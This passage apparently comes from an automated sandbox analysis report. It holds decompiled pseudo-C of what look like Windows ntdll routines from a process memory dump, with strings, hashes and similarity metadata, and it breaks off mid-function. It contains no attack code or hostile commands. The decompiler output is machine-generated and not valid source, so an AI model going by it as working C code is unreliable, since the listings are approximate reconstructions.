        _v100 = _v88;
        _t40 = _v84;
    } else {
        _t40 = 0;
    }
    _v72 = _t40;
    _v68 = &_v104;
    _push( &_v52);
    _v76 = 0x18;
    _push( &_v76);
    _v64 = 0x40;
    _v60 = _t52;
    _v56 = _t52;
    _t44 = E010F98D0();
    _t62 = _v88;
    _t65 = _t44;
    if(_t62 != 0) {
        asm("lock xadd [edi], eax");
        if((_t44 | 0xffffffff) != 0) {
            goto L4;
        }
        _push( *((intOrPtr*)(_t62 + 4)));
        E010F95D0();
        L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
        goto L4;
    } else {
        L4:
        L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
        if(_t65 >= 0) {
            _t52 = 1;
        } else {
            if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                _t52 = _t52 & 0xffffff00 | _v105 != _t52;
            }
        }
        _t35 = _t52;
        goto L8;
    }
}


                                                                            Strings
                                                                            • @ , xrefs: 010ED303
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 0fbba4325bef5b1d3754cf33350e95d2fb92afaaa3c53ff1ead9c418afeccdf3
                                                                            • Instruction ID: 627886823be226ebcdc821b03d06016cdad1f143ba5d7cc73fd85471d523244c
                                                                            • Opcode Fuzzy Hash: 0fbba4325bef5b1d3754cf33350e95d2fb92afaaa3c53ff1ead9c418afeccdf3
                                                                            • Instruction Fuzzy Hash: 6D31DFB5508301AFC321DF69C984AAFBBE8FF89654F00492EF9D483650D634DD04CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
E010C1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
    intOrPtr _v8;
    char _v16;
    intOrPtr* _t26;
    intOrPtr _t29;
    void* _t30;
    signed int _t31;

    _t27 = __ecx;
    _t29 = __edx;
    _t31 = 0;
    _v8 = __edx;
    if(__edx == 0) {
        L18:
        _t30 = 0xc000000d;
        goto L12;
    } else {
        _t26 = _a4;
        if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
            goto L18;
        } else {
            E010FBB40(__ecx, &_v16, __ecx);
            _push(_t26);
            _push(0);
            _push(0);
            _push(_t29);
            _push( &_v16);
            _t30 = E010FA9B0();
            if(_t30 >= 0) {
                _t19 = *_t26;
                if( *_t26 != 0) {
                    goto L7;
                } else {
                    *_a8 = *_a8 & 0;
                }
            } else {
                if(_t30 != 0xc0000023) {
                    L9:
                    _push(_t26);
                    _push( *_t26);
                    _push(_t31);
                    _push(_v8);
                    _push( &_v16);
                    _t30 = E010FA9B0();
                    if(_t30 < 0) {
                        L12:
                        if(_t31 != 0) {
                            L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                        }
                    } else {
                        *_a8 = _t31;
                    }
                } else {
                    _t19 = *_t26;
                    if( *_t26 == 0) {
                        _t31 = 0;
                    } else {
                        L7:
                        _t31 = L010D4620(_t27, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                    }
                    if(_t31 == 0) {
                        _t30 = 0xc0000017;
                    } else {
                        goto L9;
                    }
                }
            }
        }
    }
    return _t30;
}

                                                                            Strings
                                                                            • WindowsExcludedProcs , xrefs: 010C1BC5
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: WindowsExcludedProcs
                                                                            • API String ID: 0-3583428290
                                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                            • Instruction ID: 675c5b65396f80afdb14d9fac4380c6cc140278b267821bf1194a5d1173a5145
                                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                            • Instruction Fuzzy Hash: 8A21F87A60021DEBDB22DB59D880F9FBBADAF45A50F054479FA448B205D630DD01CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E010DF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
    intOrPtr _t13;
    intOrPtr _t14;
    signed int _t16;
    signed char _t17;
    intOrPtr _t19;
    intOrPtr _t21;
    intOrPtr _t23;
    intOrPtr* _t25;

    _t25 = _a8;
    _t17 = __ecx;
    if(_t25 == 0) {
        _t19 = 0xc00000f2;
        L8:
        return _t19;
    }
    if((__ecx & 0xfffffffe) != 0) {
        _t19 = 0xc00000ef;
        goto L8;
    }
    _t19 = 0;
    *_t25 = 0;
    _t21 = 0;
    _t23 = "Actx ";
    if(__edx != 0) {
        if(__edx == 0xfffffffc) {
            L21:
            _t21 = 0x200;
            L5:
            _t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
            *_t25 = _t13;
            L6:
            if(_t13 == 0) {
                if((_t17 & 0x00000001) != 0) {
                    *_t25 = _t23;
                }
            }
            L7:
            goto L8;
        }
        if(__edx == 0xfffffffd) {
            *_t25 = _t23;
            _t13 = _t23;
            goto L6;
        }
        _t13 =  *((intOrPtr*)(__edx + 0x10));
        *_t25 = _t13;
        L14:
        if(_t21 == 0) {
            goto L6;
        }
        goto L5;
    }
    _t14 = _a4;
    if(_t14 != 0) {
        _t16 =  *(_t14 + 0x14) & 0x00000007;
        if(_t16 <= 1) {
            _t21 = 0x1f8;
            _t13 = 0;
            goto L14;
        }
        if(_t16 == 2) {
            goto L21;
        }
        if(_t16 != 4) {
            _t19 = 0xc00000f0;
            goto L7;
        }
        _t13 = 0;
        goto L6;
    } else {
        _t21 = 0x1f8;
        goto L5;
    }
}

                                                                            Strings
                                                                            • Actx , xrefs: 010DF73F
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Actx
                                                                            • API String ID: 0-89312691
                                                                            • Opcode ID: 0d26a2cdc09c5186443166905052c9a6646965efd19d0a31fc995585986d9b42
                                                                            • Instruction ID: 7706675add4666a432382643f69b5dacca7fe8b42eb2f6b77aa8a125938f933b
                                                                            • Opcode Fuzzy Hash: 0d26a2cdc09c5186443166905052c9a6646965efd19d0a31fc995585986d9b42
                                                                            • Instruction Fuzzy Hash: 7611D034304B038BEBA94E1DC8907BA76D5BB85264F27C56AE5E7CB791DB70C8438340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 71%
E01168DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
    intOrPtr _t35;
    void* _t41;

    _t40 = __esi;
    _t39 = __edi;
    _t38 = __edx;
    _t35 = __ecx;
    _t34 = __ebx;
    _push(0x74);
    _push(0x1190d50);
    E0110D0E8(__ebx, __edi, __esi);
    *((intOrPtr*)(_t41 - 0x7c)) = __edx;
    *((intOrPtr*)(_t41 - 0x74)) = __ecx;
    if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
        E01145720(0x65, 0, "Critical error detected %lx\n", _t35);
        if( *((intOrPtr*)(_t41 + 8)) != 0) {
            *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
            asm("int3");
            *(_t41 - 4) = 0xfffffffe;
        }
    }
    *(_t41 - 4) = 1;
    *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
    *((intOrPtr*)(_t41 - 0x6c)) = 1;
    *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
    *((intOrPtr*)(_t41 - 0x64)) = L0110DEF0;
    *((intOrPtr*)(_t41 - 0x60)) = 1;
    *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
    _push(_t41 - 0x70);
    L0110DEF0(1, _t38);
    *(_t41 - 4) = 0xfffffffe;
    return E0110D130(_t34, _t39, _t40);
}

                                                                            Strings
                                                                            • Critical error detected %lx , xrefs: 01168E21
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Critical error detected %lx
                                                                            • API String ID: 0-802127002
                                                                            • Opcode ID: 404493257b9d2dd754f69b2052da156b3d0586b1a3ae0457e1f411c6bf202ec2
                                                                            • Instruction ID: 3797a546e055d72382c67ff80d373cef32c64c08f22085d778c1d608bf468905
                                                                            • Opcode Fuzzy Hash: 404493257b9d2dd754f69b2052da156b3d0586b1a3ae0457e1f411c6bf202ec2
                                                                            • Instruction Fuzzy Hash: 14113575D15348DBDF29CFE8990579CBBB4AB14314F20826EE569AB282C7750602CF14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p , xrefs: 0114FF60
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                            • API String ID: 0-1911121157
                                                                            • Opcode ID: 3e1616d738e8df48e80b032c76ca28dc876645b0ee9d22619dcf0e95d2e2b617
                                                                            • Instruction ID: 3f3d9c9634546516c66124855da92b08175e2886b685d7cb7566830d451042f5
                                                                            • Opcode Fuzzy Hash: 3e1616d738e8df48e80b032c76ca28dc876645b0ee9d22619dcf0e95d2e2b617
                                                                            • Instruction Fuzzy Hash: 1B112672910145EFDF2ADF98C948F987BB1FF08B08F548054F1086B2A1CB799941CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
                                                                                                                                  E01185BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) { 				signed int _t296; 				signed char _t298; 				signed int _t301; 				signed int _t306; 				signed int _t310; 				signed char _t311; 				intOrPtr _t312; 				signed int _t313; 				void* _t327; 				signed int _t328; 				intOrPtr _t329; 				intOrPtr _t333; 				signed char _t334; 				signed int _t336; 				void* _t339; 				signed int _t340; 				signed int _t356; 				signed int _t362; 				short _t367; 				short _t368; 				short _t373; 				signed int _t380; 				void* _t382; 				short _t385; 				signed short _t392; 				signed char _t393; 				signed int _t395; 				signed char _t397; 				signed int _t398; 				signed short _t402; 				void* _t406; 				signed int _t412; 				signed char _t414; 				signed short _t416; 				signed int _t421; 				signed char _t427; 				intOrPtr _t434; 				signed char _t435; 				signed int _t436; 				signed int _t442; 				signed int _t446; 				signed int _t447; 				signed int _t451; 				signed int _t453; 				signed int _t454; 				signed int _t455; 				intOrPtr _t456; 				intOrPtr* _t457; 				short _t458; 				signed short _t462; 				signed int _t469; 				intOrPtr* _t474; 				signed int _t475; 				signed int _t479; 				signed int _t480; 				signed int _t481; 				short _t485; 				signed int _t491; 				signed int* _t494; 				signed int _t498; 				signed int _t505; 				intOrPtr _t506; 				signed short _t508; 				signed int _t511; 				void* _t517; 				signed int _t519; 				signed int _t522; 				void* _t523; 				signed int _t524; 				void* _t528; 				signed int _t529;  				_push(0xd4); 				_push(0x1191178); 				E0110D0E8(__ebx, __edi, __esi); 				_t494 = __edx; 				 *(_t528 - 0xcc) = __edx; 				_t511 = __ecx; 				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx; 				 *(_t528 - 0xbc) = __ecx; 				 *((intOrPtr*)(_t528 - 0xc8)) =  
*((intOrPtr*)(_t528 + 0x20)); 				_t434 =  *((intOrPtr*)(_t528 + 0x24)); 				 *((intOrPtr*)(_t528 - 0xc4)) = _t434; 				_t427 = 0; 				 *(_t528 - 0x74) = 0; 				 *(_t528 - 0x9c) = 0; 				 *(_t528 - 0x84) = 0; 				 *(_t528 - 0xac) = 0; 				 *(_t528 - 0x88) = 0; 				 *(_t528 - 0xa8) = 0; 				 *((intOrPtr*)(_t434 + 0x40)) = 0; 				if( *(_t528 + 0x1c) <= 0x80) { 					__eflags =  *(__ecx + 0xc0) & 0x00000004; 					if(__eflags != 0) { 						_t421 = E01184C56(0, __edx, __ecx, __eflags); 						__eflags = _t421; 						if(_t421 != 0) { 							 *((intOrPtr*)(_t528 - 4)) = 0; 							E010FD000(0x410); 							 *(_t528 - 0x18) = _t529; 							 *(_t528 - 0x9c) = _t529; 							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe; 							E01185542(_t528 - 0x9c, _t528 - 0x84); 						} 					} 					_t435 = _t427; 					 *(_t528 - 0xd0) = _t435; 					_t474 = _t511 + 0x65; 					 *((intOrPtr*)(_t528 - 0x94)) = _t474; 					_t511 = 0x18; 					while(1) { 						 *(_t528 - 0xa0) = _t427; 						 *(_t528 - 0xbc) = _t427; 						 *(_t528 - 0x80) = _t427; 						 *(_t528 - 0x78) = 0x50; 						 *(_t528 - 0x79) = _t427; 						 *(_t528 - 0x7a) = _t427; 						 *(_t528 - 0x8c) = _t427; 						 *(_t528 - 0x98) = _t427; 						 *(_t528 - 0x90) = _t427; 						 *(_t528 - 0xb0) = _t427; 						 *(_t528 - 0xb8) = _t427; 						_t296 = 1 << _t435; 						_t436 =  *(_t528 + 0xc) & 0x0000ffff; 						__eflags = _t436 & _t296; 						if((_t436 & _t296) != 0) { 							goto L92; 						} 						__eflags =  *((char*)(_t474 - 1)); 						if( *((char*)(_t474 - 1)) == 0) { 							goto L92; 						} 						_t301 =  *_t474; 						__eflags = _t494[1] - _t301; 						if(_t494[1] <= _t301) { 							L10: 							__eflags =  *(_t474 - 5) & 0x00000040; 							if(( *(_t474 - 5) & 0x00000040) == 0) { 								L12: 								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]; 								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) { 									goto L92; 								} 								_t442 =  *(_t474 - 0x11) & _t494[3]; 								__eflags = ( 
*(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15); 								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) { 									goto L92; 								} 								__eflags = _t442 -  *(_t474 - 0x11); 								if(_t442 !=  *(_t474 - 0x11)) { 									goto L92; 								} 								L15: 								_t306 =  *(_t474 + 1) & 0x000000ff; 								 *(_t528 - 0xc0) = _t306; 								 *(_t528 - 0xa4) = _t306; 								__eflags =  *0x11a60e8; 								if( *0x11a60e8 != 0) { 									__eflags = _t306 - 0x40; 									if(_t306 < 0x40) { 										L20: 										asm("lock inc dword [eax]"); 										_t310 =  *0x11a60e8; // 0x0 										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8); 										__eflags = _t311 & 0x00000001; 										if((_t311 & 0x00000001) == 0) { 											 *(_t528 - 0xa0) = _t311; 											_t475 = _t427; 											 *(_t528 - 0x74) = _t427; 											__eflags = _t475; 											if(_t475 != 0) { 												L91: 												_t474 =  *((intOrPtr*)(_t528 - 0x94)); 												goto L92; 											} 											asm("sbb edi, edi"); 											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50; 											_t511 = _t498; 											_t312 =  *((intOrPtr*)(_t528 - 0x94)); 											__eflags =  *(_t312 - 5) & 1; 											if(( *(_t312 - 5) & 1) != 0) { 												_push(_t528 - 0x98); 												_push(0x4c); 												_push(_t528 - 0x70); 												_push(1); 												_push(0xfffffffa); 												_t412 = E010F9710(); 												_t475 = _t427; 												__eflags = _t412; 												if(_t412 >= 0) { 													_t414 =  *(_t528 - 0x98) - 8; 													 *(_t528 - 0x98) = _t414; 													_t416 = _t414 + 0x0000000f & 0x0000fff8; 													 *(_t528 - 0x8c) = _t416; 													 *(_t528 - 0x79) = 1; 													_t511 = (_t416 & 0x0000ffff) + _t498; 													__eflags = _t511; 												} 											} 											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5); 											__eflags = _t446 & 0x00000004; 											if((_t446 & 0x00000004) != 0) { 												__eflags =  *(_t528 - 
0x9c); 												if( *(_t528 - 0x9c) != 0) { 													 *(_t528 - 0x7a) = 1; 													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff); 													__eflags = _t511; 												} 											} 											_t313 = 2; 											_t447 = _t446 & _t313; 											__eflags = _t447; 											 *(_t528 - 0xd4) = _t447; 											if(_t447 != 0) { 												_t406 = 0x10; 												_t511 = _t511 + _t406; 												__eflags = _t511; 											} 											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4)); 											 *(_t528 - 0x88) = _t427; 											__eflags =  *(_t528 + 0x1c); 											if( *(_t528 + 0x1c) <= 0) { 												L45: 												__eflags =  *(_t528 - 0xb0); 												if( *(_t528 - 0xb0) != 0) { 													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8); 													__eflags = _t511; 												} 												__eflags = _t475; 												if(_t475 != 0) { 													asm("lock dec dword [ecx+edx*8+0x4]"); 													goto L100; 												} else { 													_t494[3] = _t511; 													_t451 =  *(_t528 - 0xa0); 													_t427 = E010F6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc); 													 *(_t528 - 0x88) = _t427; 													__eflags = _t427; 													if(_t427 == 0) { 														__eflags = _t511 - 0xfff8; 														if(_t511 <= 0xfff8) { 															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511; 															asm("sbb ecx, ecx"); 															__eflags = (_t451 & 0x000000e2) + 8; 														} 														asm("lock dec dword [eax+edx*8+0x4]"); 														L100: 														goto L101; 													} 													_t453 =  *(_t528 - 0xa0); 													 *_t494 = _t453; 													_t494[1] = _t427; 													_t494[2] =  *(_t528 - 0xbc); 													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1; 													 *_t427 =  *(_t453 + 0x24) | 
_t511; 													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10)); 													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8)); 													asm("movsd"); 													asm("movsd"); 													asm("movsd"); 													asm("movsd"); 													asm("movsd"); 													asm("movsd"); 													asm("movsd"); 													asm("movsd"); 													__eflags =  *(_t528 + 0x14); 													if( *(_t528 + 0x14) == 0) { 														__eflags =  *[fs:0x18] + 0xf50; 													} 													asm("movsd"); 													asm("movsd"); 													asm("movsd"); 													asm("movsd"); 													__eflags =  *(_t528 + 0x18); 													if( *(_t528 + 0x18) == 0) { 														_t454 =  *(_t528 - 0x80); 														_t479 =  *(_t528 - 0x78); 														_t327 = 1; 														__eflags = 1; 													} else { 														_t146 = _t427 + 0x50; // 0x50 														_t454 = _t146; 														 *(_t528 - 0x80) = _t454; 														_t382 = 0x18; 														 *_t454 = _t382; 														 *((short*)(_t454 + 2)) = 1; 														_t385 = 0x10; 														 *((short*)(_t454 + 6)) = _t385; 														 *(_t454 + 4) = 0; 														asm("movsd"); 														asm("movsd"); 														asm("movsd"); 														asm("movsd"); 														_t327 = 1; 														 *(_t427 + 4) =  *(_t427 + 4) | 1; 														_t479 = 0x68; 														 *(_t528 - 0x78) = _t479; 													} 													__eflags =  *(_t528 - 0x79) - _t327; 													if( *(_t528 - 0x79) == _t327) { 														_t524 = _t479 + _t427; 														_t508 =  *(_t528 - 0x8c); 														 *_t524 = _t508; 														_t373 = 2; 														 *((short*)(_t524 + 2)) = _t373; 														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98); 														 *((short*)(_t524 + 4)) = 0; 														_t167 = _t524 + 8; // 0x8 														E010FF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98)); 														_t529 = _t529 + 0xc; 														 *(_t427 + 4) =  *(_t427 + 4) | 1; 				
										_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff); 														 *(_t528 - 0x78) = _t479; 														_t380 =  *(_t528 - 0x80); 														__eflags = _t380; 														if(_t380 != 0) { 															_t173 = _t380 + 4; 															 *_t173 =  *(_t380 + 4) | 1; 															__eflags =  *_t173; 														} 														_t454 = _t524; 														 *(_t528 - 0x80) = _t454; 														_t327 = 1; 														__eflags = 1; 													} 													__eflags =  *(_t528 - 0xd4); 													if( *(_t528 - 0xd4) == 0) { 														_t505 =  *(_t528 - 0x80); 													} else { 														_t505 = _t479 + _t427; 														_t523 = 0x10; 														 *_t505 = _t523; 														_t367 = 3; 														 *((short*)(_t505 + 2)) = _t367; 														_t368 = 4; 														 *((short*)(_t505 + 6)) = _t368; 														 *(_t505 + 4) = 0; 														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4)); 														_t327 = 1; 														 *(_t427 + 4) =  *(_t427 + 4) | 1; 														_t479 = _t479 + _t523; 														 *(_t528 - 0x78) = _t479; 														__eflags = _t454; 														if(_t454 != 0) { 															_t186 = _t454 + 4; 															 *_t186 =  *(_t454 + 4) | 1; 															__eflags =  *_t186; 														} 														 *(_t528 - 0x80) = _t505; 													} 													__eflags =  *(_t528 - 0x7a) - _t327; 													if( *(_t528 - 0x7a) == _t327) { 														 *(_t528 - 0xd4) = _t479 + _t427; 														_t522 =  *(_t528 - 0x84) & 0x0000ffff; 														E010FF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522); 														_t529 = _t529 + 0xc; 														 *(_t427 + 4) =  *(_t427 + 4) | 1; 														_t479 =  *(_t528 - 0x78) + _t522; 														 *(_t528 - 0x78) = _t479; 														__eflags = _t505; 														if(_t505 != 0) { 															_t199 = _t505 + 4; 															 *_t199 =  *(_t505 + 4) | 1; 															__eflags =  *_t199; 														} 										
				_t505 =  *(_t528 - 0xd4); 														 *(_t528 - 0x80) = _t505; 													} 													__eflags =  *(_t528 - 0xa8); 													if( *(_t528 - 0xa8) != 0) { 														_t356 = _t479 + _t427; 														 *(_t528 - 0xd4) = _t356; 														_t462 =  *(_t528 - 0xac); 														 *_t356 = _t462 + 0x0000000f & 0x0000fff8; 														_t485 = 0xc; 														 *((short*)(_t356 + 2)) = _t485; 														 *(_t356 + 6) = _t462; 														 *((short*)(_t356 + 4)) = 0; 														_t211 = _t356 + 8; // 0x9 														E010FF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff); 														E010FFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff); 														_t529 = _t529 + 0x18; 														_t427 =  *(_t528 - 0x88); 														 *(_t427 + 4) =  *(_t427 + 4) | 1; 														_t505 =  *(_t528 - 0xd4); 														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff); 														 *(_t528 - 0x78) = _t479; 														_t362 =  *(_t528 - 0x80); 														__eflags = _t362; 														if(_t362 != 0) { 															_t222 = _t362 + 4; 															 *_t222 =  *(_t362 + 4) | 1; 															__eflags =  *_t222; 														} 													} 													__eflags =  *(_t528 - 0xb0); 													if( *(_t528 - 0xb0) != 0) { 														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8; 														_t458 = 0xb; 														 *((short*)(_t479 + _t427 + 2)) = _t458; 														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90); 														 *((short*)(_t427 + 4 + _t479)) = 0; 														 *(_t528 - 0xb8) = _t479 + 8 + _t427; 														E010FFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff); 														_t529 = _t529 + 0xc; 														 *(_t427 + 4) =  *(_t427 + 4) | 1; 														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) 
& 0x0000ffff); 														 *(_t528 - 0x78) = _t479; 														__eflags = _t505; 														if(_t505 != 0) { 															_t241 = _t505 + 4; 															 *_t241 =  *(_t505 + 4) | 1; 															__eflags =  *_t241; 														} 													} 													_t328 =  *(_t528 + 0x1c); 													__eflags = _t328; 													if(_t328 == 0) { 														L87: 														_t329 =  *((intOrPtr*)(_t528 - 0xe0)); 														 *((intOrPtr*)(_t427 + 0x10)) = _t329; 														_t455 =  *(_t528 - 0xdc); 														 *(_t427 + 0x14) = _t455; 														_t480 =  *(_t528 - 0xa0); 														_t517 = 3; 														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517; 														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) { 															asm("rdtsc"); 															 *(_t427 + 0x3c) = _t480; 														} else { 															 *(_t427 + 0x3c) = _t455; 														} 														 *((intOrPtr*)(_t427 + 0x38)) = _t329; 														_t456 =  *[fs:0x18]; 														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24)); 														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20)); 														_t427 = 0; 														__eflags = 0; 														_t511 = 0x18; 														goto L91; 													} else { 														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc; 														__eflags = _t519; 														 *(_t528 - 0x8c) = _t328; 														do { 															_t506 =  *((intOrPtr*)(_t519 - 4)); 															_t457 =  *((intOrPtr*)(_t519 - 0xc)); 															 *(_t528 - 0xd4) =  *(_t519 - 8); 															_t333 =  *((intOrPtr*)(_t528 - 0xb4)); 															__eflags =  *(_t333 + 0x36) & 0x00004000; 															if(( *(_t333 + 0x36) & 0x00004000) != 0) { 																_t334 =  *_t519; 															} else { 																_t334 = 0; 															} 															_t336 = _t334 & 0x000000ff; 															__eflags = _t336; 															_t427 =  *(_t528 - 0x88); 															if(_t336 == 0) { 								
								_t481 = _t479 + _t506; 																__eflags = _t481; 																 *(_t528 - 0x78) = _t481; 																E010FF3E0(_t479 + _t427, _t457, _t506); 																_t529 = _t529 + 0xc; 															} else { 																_t340 = _t336 - 1; 																__eflags = _t340; 																if(_t340 == 0) { 																	E010FF3E0( *(_t528 - 0xb8), _t457, _t506); 																	_t529 = _t529 + 0xc; 																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506; 																} else { 																	__eflags = _t340 == 0; 																	if(_t340 == 0) { 																		__eflags = _t506 - 8; 																		if(_t506 == 8) { 																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457; 																			 *(_t528 - 0xdc) =  *(_t457 + 4); 																		} 																	} 																} 															} 															_t339 = 0x10; 															_t519 = _t519 + _t339; 															_t263 = _t528 - 0x8c; 															 *_t263 =  *(_t528 - 0x8c) - 1; 															__eflags =  *_t263; 															_t479 =  *(_t528 - 0x78); 														} while ( *_t263 != 0); 														goto L87; 													} 												} 											} else { 												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000; 												 *(_t528 - 0xa2) = _t392; 												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8; 												__eflags = _t469; 												while(1) { 													 *(_t528 - 0xe4) = _t511; 													__eflags = _t392; 													_t393 = _t427; 													if(_t392 != 0) { 														_t393 =  *((intOrPtr*)(_t469 + 4)); 													} 													_t395 = (_t393 & 0x000000ff) - _t427; 													__eflags = _t395; 													if(_t395 == 0) { 														_t511 = _t511 +  *_t469; 														__eflags = _t511; 													} else { 														_t398 = _t395 - 1; 														__eflags = _t398; 														if(_t398 == 0) { 															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469; 															 *(_t528 - 0xb0) =  
